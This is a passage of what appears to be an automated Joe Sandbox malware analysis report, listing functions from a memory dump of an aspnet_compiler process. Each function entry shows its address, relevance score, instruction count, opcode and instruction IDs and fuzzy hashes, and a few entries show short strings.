                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: f45ec9e88dc7a05bcae0bd5c6ae0d503ca52eebbcb4fb1af1c7f8c950ba2c6fd
                                                              • Instruction ID: f2d4c34e88dae8d53e5d4bef528b8ebfc2d4ad548fd78546737baa557d1b49b8
                                                              • Opcode Fuzzy Hash: f45ec9e88dc7a05bcae0bd5c6ae0d503ca52eebbcb4fb1af1c7f8c950ba2c6fd
                                                              • Instruction Fuzzy Hash: 08827B75E002198FEB26CFA8C988BEDBBF5BF48710F148169E95DAB391D7309941CB50
                                                              Function 01A66420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 8f0c5a37584c28921307cb8c41f03224e019980753449f47a4abb4c9bebeb50a
                                                              • Instruction ID: cee76c2411b6b7759a2fdf9d1ce9b637e7c6a51791bd8fe7815484d01ef27436
                                                              • Opcode Fuzzy Hash: 8f0c5a37584c28921307cb8c41f03224e019980753449f47a4abb4c9bebeb50a
                                                              • Instruction Fuzzy Hash: A1917371900619BFEB25DF95DD85FAEBBB8EF58750F100065F605AB190D774AD00CBA0
                                                              Function 01A8E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 2beef990c28f91ae39cf8d1ca3cf59a94eaedcb97b49093ca8d0dcae3eaed10e
                                                              • Instruction ID: 66d83b8fa9c79eb511ea0749c2b3e6eba763ac94bb19be12b970b07c097bde90
                                                              • Opcode Fuzzy Hash: 2beef990c28f91ae39cf8d1ca3cf59a94eaedcb97b49093ca8d0dcae3eaed10e
                                                              • Instruction Fuzzy Hash: 9091AD3290164AFEDF22ABA4DD44FAFBBB9EF85750F140029F605A7250EB749D01CB90
                                                              Function 01A1A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 1e4add53e976b3ed2e46881a7a1053da3ccbd2d28f61d60491c6ded9828d14ae
                                                              • Instruction ID: 3fc4dee03b3b981ab53a018c688d55578d523c3b98c73224bd8ab8a5e6245aa0
                                                              • Opcode Fuzzy Hash: 1e4add53e976b3ed2e46881a7a1053da3ccbd2d28f61d60491c6ded9828d14ae
                                                              • Instruction Fuzzy Hash: E871A2B5E0420ADFDF69CF9CD5906EDBBB2BF88710F54812EE909A7245E7309841CB60
                                                              Function 01A1CDB1 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O:z`(
                                                              • API String ID: 0-2318995099
                                                              • Opcode ID: 81af68408b96fb4592619c837882b6badf06842fec18e405e90d1e5bfe566f37
                                                              • Instruction ID: 8ca0f55fea37f339fb88aeb596fff30120b4241f66e7bf00a023f28ac88aecd6
                                                              • Opcode Fuzzy Hash: 81af68408b96fb4592619c837882b6badf06842fec18e405e90d1e5bfe566f37
                                                              • Instruction Fuzzy Hash: EB61EFB1A00206DFDB19DFA8C980BAEB7B5FF48324F154169EA16EB295DB34D901CF50
                                                              Function 01A84978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: a2f69833ef169602f3066fcef65b1ecfb863f7712f43c6cb20892a8a5b268ad6
                                                              • Instruction ID: 02fc5ff335950bac4e963f78aceb8816562a8c7ae87fa2cddfdc72389b040d83
                                                              • Opcode Fuzzy Hash: a2f69833ef169602f3066fcef65b1ecfb863f7712f43c6cb20892a8a5b268ad6
                                                              • Instruction Fuzzy Hash: 0F518072D0022ADBDF11EF99D944BAEFBB4AF5CB10F05412AEA15BB240D7349901CBA4
                                                              Function 019FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 7d819afb268bbde7dc208bfea6fdfa30efbe3f5bd3bd2618be142a4eb1cd67ea
                                                              • Instruction ID: 317280e6e8acbbaa99e41fbafcdd7aa5f796edd605039f781e599bc2321cac05
                                                              • Opcode Fuzzy Hash: 7d819afb268bbde7dc208bfea6fdfa30efbe3f5bd3bd2618be142a4eb1cd67ea
                                                              • Instruction Fuzzy Hash: 54417F72508352ABD711DA75C980B6BBBE8AFC8714F06092DFA8CE7190E674DA04C796
                                                              Function 01A5C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 60f4e2e6a2bdde3e9b3ef4338dca8b3c11486f5328342ac739b205fcd3865e44
                                                              • Instruction ID: 22630c9e2d0eca58bca547d09365c165cf9cd015ee2c6f03acb7a6d7cbe2e91d
                                                              • Opcode Fuzzy Hash: 60f4e2e6a2bdde3e9b3ef4338dca8b3c11486f5328342ac739b205fcd3865e44
                                                              • Instruction Fuzzy Hash: DB4184B1D0422DABDB21DB64CD80FDEB77CAB55724F0045A5EB08AB144DB709E88CFA4
                                                              Function 01A76B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 49a0cac73e7f8d4a5166a6e96627e909bf59149c40ddbe17bc640972ee64ae05
                                                              • Instruction ID: 4e0faee56f22d942c722383c376e0182ee27a5964849898680fbce43941100e6
                                                              • Opcode Fuzzy Hash: 49a0cac73e7f8d4a5166a6e96627e909bf59149c40ddbe17bc640972ee64ae05
                                                              • Instruction Fuzzy Hash: E431F631E00B199AFB22DF69CC50BBE7BB8DF45704F144028EA59AB282D775DA05CB54
                                                              Function 01A5CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 8f449600fb95424ab4ffb44c49f465f9f343844afd7f166f3198571c4f066396
                                                              • Instruction ID: d9baffd518733a51f3f55ba63895614a8c898bb158ce9d3f8df460bfa9e21fdc
                                                              • Opcode Fuzzy Hash: 8f449600fb95424ab4ffb44c49f465f9f343844afd7f166f3198571c4f066396
                                                              • Instruction Fuzzy Hash: 2D31E336904616AFEB15DB59C855E6FBB78EB80730F024129EE15A7258E730AE04DBE0
                                                              Function 01A6892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A6895E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: ac80e7dacc1bf9ecfd7209042e7bb3d09a6cb7507805debfe6c2a8e2c46cb5f0
                                                              • Instruction ID: 6431bb46a4d1b654b112a2862bd7f18fbaf2a9c39df7355f837bdc99228b3a31
                                                              • Opcode Fuzzy Hash: ac80e7dacc1bf9ecfd7209042e7bb3d09a6cb7507805debfe6c2a8e2c46cb5f0
                                                              • Instruction Fuzzy Hash: C201F237201701AFE6316B59C988A6A7BBDFFD5698F08042CF64687151CB34A885C792
                                                              Function 01A82000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b63e60fd0430bb516232109c7529fc674eab2d736b504588e29819a887a74134
                                                              • Instruction ID: f0c1a087509e665275f7f52fa9be1a616c142a498dd51ffcf6c431dfa55fdc35
                                                              • Opcode Fuzzy Hash: b63e60fd0430bb516232109c7529fc674eab2d736b504588e29819a887a74134
                                                              • Instruction Fuzzy Hash: FF42D5756083419FDB26EF69C890B7BBBE5BF88300F58092EFA8697250D770D845CB52
                                                              Function 01A78158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fef668851bb49ecfe816bc26fe58f15f60ce6cc729d3a32869bb750a3bd8c92
                                                              • Instruction ID: 9804d2630162c1ce0f525fa09770207f49dafa99bfc702b95d307212fa48c83a
                                                              • Opcode Fuzzy Hash: 7fef668851bb49ecfe816bc26fe58f15f60ce6cc729d3a32869bb750a3bd8c92
                                                              • Instruction Fuzzy Hash: 27427F75E002199FEB25CF69CC45BADBBF5BF48301F188099E949EB242D7389A85CF50
                                                              Function 019F2840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7e00fbe715353f870dcbccfe9dc25283ec415df3f8c15d4f490cbc1cb02fc4
                                                              • Instruction ID: c712f55841837e668c9cea9245978a7be1c08bdd00e2331d761ae97a665d5b2f
                                                              • Opcode Fuzzy Hash: 6c7e00fbe715353f870dcbccfe9dc25283ec415df3f8c15d4f490cbc1cb02fc4
                                                              • Instruction Fuzzy Hash: 3832FE74A007558BEB29CF69C944BBEBBF2BFC6300F24411DD58E9B285D735A846CB90
                                                              Function 01A8A118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
                                                              • Instruction ID: 5bbce8c0c2623d2ed1f970f77804ceb087e15a9aaa6aa3f1957191763ef35709
                                                              • Opcode Fuzzy Hash: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
                                                              • Instruction Fuzzy Hash: 3D22BF742046618BEB25EF2DC094772BBF1AF44304F08845BEA97CF286E775E492DB60
                                                              Function 01A08DBF Relevance: .6, Instructions: 554COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7437abc2ff96f1dfbe711baee3238ee18508ff5874d08b1c66942d28994932b0
                                                              • Instruction ID: fb33fed558dc29f945937b88c05c8ab4010ab897a9c1677debe96b84a36bf4b9
                                                              • Opcode Fuzzy Hash: 7437abc2ff96f1dfbe711baee3238ee18508ff5874d08b1c66942d28994932b0
                                                              • Instruction Fuzzy Hash: 1B226270E00116DBCF16CFA9D4809BEFBF6BF94714B18805AE9459B242E778ED41CBA4
                                                              Function 019E6A50 Relevance: .5, Instructions: 548COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 631a6aa9568812a2e29633e8538270fd0f5151aa39a2faf53f2e791352c1194e
                                                              • Instruction ID: 78137e66517edf6c427f7ae9046e6c31a27cd4b5ee20d5745a2dcb204d8efa46
                                                              • Opcode Fuzzy Hash: 631a6aa9568812a2e29633e8538270fd0f5151aa39a2faf53f2e791352c1194e
                                                              • Instruction Fuzzy Hash: A932A071A04205CFDB26CF68C584BAABBF5FF98310F144969E95AAB392D734F841CB50
                                                              Function 01A04A35 Relevance: .4, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: 6e489795fb7e5fb4d4d9e0652139778e4009606e53a8e03584a6eaf20dd19367
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: D3F13171E0061A9FDF16CF99E590BAEBBF5BF48710F098129EA05AB381D774D841CB60
                                                              Function 01A7892B Relevance: .4, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0dae52124b78a384156631f9f5f84198fcf81e5a97f2041aa54e1f21fc934baa
                                                              • Instruction ID: 4f000f4f8c706889d476a1b537ee5ee48969c3ac1ffce57bb600a1bc5a3dd2c8
                                                              • Opcode Fuzzy Hash: 0dae52124b78a384156631f9f5f84198fcf81e5a97f2041aa54e1f21fc934baa
                                                              • Instruction Fuzzy Hash: 5CD1FE71E0060A9BDF05CF69CC45ABEBBF1AF88304F198169D955E7241E73DEA05CB60
                                                              Function 019E65D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
                                                              • Instruction ID: 253e7ceca80dbbf5723c220c3a4aa9b868b705926be5dbf08949a5a6f6bcd355
                                                              • Opcode Fuzzy Hash: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
                                                              • Instruction Fuzzy Hash: 58E19C71608342CFC716CF2CC494A6ABBE4FF99314F058A6DE99987351EB31E905CB92
                                                              Function 019D8397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
                                                              • Instruction ID: 103075e668d6e13b70892ba616f7fc58b77852d54bcfcff415d2374e70f01fe6
                                                              • Opcode Fuzzy Hash: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
                                                              • Instruction Fuzzy Hash: A9D1E271A002069BDB14DF68C881FBAB7B5FF94714F05862DF91ADB282E734D951CB60
                                                              Function 01A68243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: 558fb0416c518376d14419b7c16b1fbb06b94c1fea8bfa84c9d52c63b60d2a4d
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: D0B16F74A00709AFDF24DFA9C940AABBBBDFF84304F14446DAA5297795DA38E905CB10
                                                              Function 019F0535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 90b25d206524194a849f0cc4aa5fe54ffe21494be4775216ae338d5862d84c07
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: E4B11731600646AFDB21DB68C854BBEBBFBAFC8300F184599E656D7282D730ED41CB90
                                                              Function 01A00DE1 Relevance: .3, Instructions: 295COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5550495d7e6d57d69f97d10e990d2c79bb1261659d5d8ec5b83b3fd9ab29bc3b
                                                              • Instruction ID: 76bcb59be9a98158759d9c1d8c6162e7902c043f925abcd57ff0abf1758f7fc2
                                                              • Opcode Fuzzy Hash: 5550495d7e6d57d69f97d10e990d2c79bb1261659d5d8ec5b83b3fd9ab29bc3b
                                                              • Instruction Fuzzy Hash: 12C18B70E0021ADFDB26CFA9D984BEEBBB5FF88344F14412DE506AB285D770A941CB40
                                                              Function 019E83C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
                                                              • Instruction ID: 21f8b1cef04b8a082145253ad4c896ca26ec635e538a73236f3b47963a3ec237
                                                              • Opcode Fuzzy Hash: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
                                                              • Instruction Fuzzy Hash: D8C158742083418FE765CF19C484BABB7E8FF88704F44496DE98987291EB74E948CF92
                                                              Function 019DC427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
                                                              • Instruction ID: 30808c129744701726177ad6d22bd97c8102a94e3f992293f1655f27fdb1a74c
                                                              • Opcode Fuzzy Hash: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
                                                              • Instruction Fuzzy Hash: F7B17F70A042668BDB25CF68C990BA9B3B5EF84710F44C5EDD54EE7281EB309D86CF20
                                                              Function 01A0E5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87a629e8155aefa73a09ff2faaa3e7f2914d374348ad2c64d43534cef5a0bd62
                                                              • Instruction ID: 33896f77932e1ad54418810aa64c4c72a39528b9d3adacc7df0287c5ff7b5d4d
                                                              • Opcode Fuzzy Hash: 87a629e8155aefa73a09ff2faaa3e7f2914d374348ad2c64d43534cef5a0bd62
                                                              • Instruction Fuzzy Hash: B2A13531E00619AFEB22DBACE944FAEBBB4EF41714F090525EA01AB2D1D7749D41CBD1
                                                              Function 01A20185 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a6cf233be6e99d4981159d7651d60a1d054fe21fba2c4a78148063786fbd810
                                                              • Instruction ID: 90cd06ffb3116cde82ae4fea11cd7be9daa134f34e75dfeeac1b656009a9fa7e
                                                              • Opcode Fuzzy Hash: 2a6cf233be6e99d4981159d7651d60a1d054fe21fba2c4a78148063786fbd810
                                                              • Instruction Fuzzy Hash: 15A1C170B01626DFDB25CF6DC690BAAB7B5FF54314F04412AFA059B682DB34E815CB50
                                                              Function 01AB4500 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26baf12d08ff472ffc806050ddd0e46112df1bd384f2cf179d1f9cb592f12662
                                                              • Instruction ID: c3fe88464d2f48bb9e1c70460dc0a013c9b3ce9ac4971529ac195c56859b05b0
                                                              • Opcode Fuzzy Hash: 26baf12d08ff472ffc806050ddd0e46112df1bd384f2cf179d1f9cb592f12662
                                                              • Instruction Fuzzy Hash: 3FA1D172A04692EFD712DF58C980B9ABBE9FF48704F05052CE54A9B652D334ED41CB91
                                                              Function 01A660E0 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99ab13922a360efb928dd275dcdeb56f2b2a501524759571d4a0d9891722f81f
                                                              • Instruction ID: 7a2c952fc162462e01cd701d8b3a5ee92884c2c26b5dfcf49492f4c2866e8a7c
                                                              • Opcode Fuzzy Hash: 99ab13922a360efb928dd275dcdeb56f2b2a501524759571d4a0d9891722f81f
                                                              • Instruction Fuzzy Hash: C6918171D00216AFDB15CFA9D894BAEBFB9AF48710F154169E618EB341D734EA009BA0
                                                              Function 019FE3F0 Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89770f7cc83ca20d3213cde8e1eb2099fec943c8006036b86f2a21108cb54fde
                                                              • Instruction ID: 7bbac6b0b99520bb143d57ac0dd2d9019e54c12dcfa62fb2d82b3fcb72c08d28
                                                              • Opcode Fuzzy Hash: 89770f7cc83ca20d3213cde8e1eb2099fec943c8006036b86f2a21108cb54fde
                                                              • Instruction Fuzzy Hash: 50913535A00616EBEB25DB5CC484B7EBBA1EF88B14F06446DEB09DB3A1E634D901C751
                                                              Function 01A36ACC Relevance: .2, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
